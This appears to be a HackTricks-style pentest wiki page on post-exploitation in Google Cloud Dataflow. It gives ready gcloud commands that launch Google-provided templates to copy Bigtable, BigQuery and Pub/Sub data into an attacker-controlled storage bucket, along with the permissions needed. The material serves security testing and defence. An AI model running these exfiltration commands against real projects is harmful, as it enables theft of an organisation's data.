# GCP - Dataflow Post Exploitation
{{#include ../../../banners/hacktricks-training.md}}
## Dataflow
For more information about Dataflow check:
{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}
## Using Dataflow to exfiltrate data from other services

**Permissions**: `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (on a service account with access to the source and the sink)
With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access, for example via the Dataflow Rider privilege escalation (pipeline takeover via bucket write).
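To see which Google-provided templates you can abuse, you can list the public templates bucket. This is a quick check, assuming the standard `gs://dataflow-templates-<REGION>/latest/` layout used by the commands below:

```bash
# List the Google-provided classic templates in the public bucket
# (path layout is an assumption; set <REGION> to the region you target)
gsutil ls gs://dataflow-templates-<REGION>/latest/
```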
### Bigtable to GCS

See GCP - Bigtable Post Exploitation → "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
```bash
# Export a Bigtable table to an attacker-controlled bucket
gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
  --project=<PROJECT> \
  --region=<REGION> \
  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
  --staging-location=gs://<YOUR_BUCKET>/staging/
```
### BigQuery to GCS

Google-provided Dataflow templates also exist to export BigQuery data. Pick the template matching your target format (JSON, Avro, etc.) and point the output at your bucket.
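A minimal sketch, assuming the Google-provided `BigQuery_to_Parquet` Flex Template and its `tableRef`/`bucket` parameters (template path and parameter names may vary per version):

```bash
# Export a BigQuery table to Parquet files in an attacker-controlled bucket
# (assumes the Google-provided BigQuery_to_Parquet Flex Template)
gcloud dataflow flex-template run <job-name> \
  --project=<PROJECT> \
  --region=<REGION> \
  --template-file-gcs-location=gs://dataflow-templates-<REGION>/latest/flex/BigQuery_to_Parquet \
  --parameters=tableRef=<PROJECT>:<DATASET>.<TABLE>,bucket=gs://<YOUR_BUCKET>/bq-export/
```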
### Pub/Sub and streaming sources
Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
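A minimal sketch, assuming the Google-provided `Cloud_PubSub_to_GCS_Text` classic template and its `inputTopic`/`outputDirectory`/`outputFilenamePrefix` parameters:

```bash
# Continuously dump messages from a Pub/Sub topic to text files in your bucket
# (assumes the Google-provided "Pub/Sub to Cloud Storage Text" classic template)
gcloud dataflow jobs run <job-name> \
  --gcs-location=gs://dataflow-templates-<REGION>/latest/Cloud_PubSub_to_GCS_Text \
  --project=<PROJECT> \
  --region=<REGION> \
  --staging-location=gs://<YOUR_BUCKET>/staging/ \
  --parameters=inputTopic=projects/<PROJECT>/topics/<TOPIC>,outputDirectory=gs://<YOUR_BUCKET>/pubsub-dump/,outputFilenamePrefix=msg-
```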
## References
{{#include ../../../banners/hacktricks-training.md}}